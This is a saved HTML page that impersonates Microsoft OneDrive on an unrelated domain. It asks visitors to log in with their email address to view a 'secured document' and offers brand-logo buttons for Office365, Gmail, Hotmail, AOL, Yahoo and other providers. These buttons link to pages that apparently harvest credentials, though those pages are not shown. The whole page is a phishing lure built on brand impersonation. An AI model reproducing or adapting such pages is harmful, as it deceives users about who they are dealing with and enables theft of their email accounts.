<!-- saved from url=(0072)http://encryptedocspdfdoc.fly2sky.info/0c86f3af411145fa86886ad15b98e7b2/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Microsoft OneDrive </title>
<meta name="GENERATOR" "="">
<meta name="HOSTING" "="">
<link rel="shortcut icon" href="index_files/favicon.ico" type="image/x-icon">
<style type="text/css">
div#container
{
   width: 1304px;
   position: relative;
   margin-top: 0px;
   margin-left: auto;
   margin-right: auto;
   text-align: left;
}
</style>
<style type="text/css">
body
{
   text-align: center;
   margin: 0;
   background-color: #FFFFFF;
   color: #000000;
}
#backgroundimage
{
   height: auto;
   left: 0;
   margin: 0;
   min-height: 100%;
   min-width: 1304px;
   padding: 0;
   position: fixed;
   top: 0;
   width: 100%;
   z-index: -1;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<script type="text/javascript">
<!--
function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height)
{
   if (left == -1)
   {
      left = (screen.width/2)-(width/2);
   }
   if (top == -1)
   {
      top = (screen.height/2)-(height/2);
   }
   var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height);
}
//-->
</script>

</head><body><center>
 <img src="./index_files/Yeeeee.png" height="286" width="1642">
</center>

 </center>
</center><table id="wrapper" align="center" cellpadding="10" cellspacing="4">
<tbody>

<strong><p> <font color="black" >Kindly login with your email address to view the secured document</p><strong/>
<br/>
<p> <font color="black" >Choose your email provider below to continue</p>

</tbody></table><table width="100%">
<tbody>
<td width="100%">
</td>
</tr>
</tbody>
</table>
<table id="invoicetoptables" cellspacing="0" width="100%">
<tbody>
<tr>
<td id="invoicecontent" width="50%">
<table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%">
 <tbody>
 <tr>
 <td id="invoicecontent" valign="top">
<p align="center">
 <a href="0007ic" target="_self">
 <img src="./index_files/office.png" title="Office365" id="displayTexthotmail" border="0" height="69" width="151">
 
 <a href="G6m4il" target="_self">
 <img src="./index_files/G001.jpg" title="Gmail" id="displayTextgmail" border="0" height="69" width="151">

 <a href="L7l153" target="_self">
 <img src="./index_files/H001.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="69" width="151">
 </a>
 <br>
 <a href="A0711" target="_self">
 <img src="./index_files/A001.jpg" title="Aol" id="displayTextaol" border="0" height="69" width="151">
 
 <a href="07ha" target="_self">
 <img src="./index_files/O001.jpg" title="Other Email" id="displayTextother" border="0" height="69" width="151">
 
<a href="Yalklo" target="_self">
 <img src="./index_files/Y001.jpg" title="Yahoomail" id="displayText" border="0" height="69" width="151">
 </a>
</p>
 <center>
<br>
<br>

<img src="./index_files/jawel.jpg" height="306" width="523">
<br>
<br>
<br>
 <p><font size="3" color="grey">OneDrive makes it easy to create, store and share online documents, spreadsheets and presentations </font></p>
 
 
 </center>

</td></tr></tbody></table></center></body></html>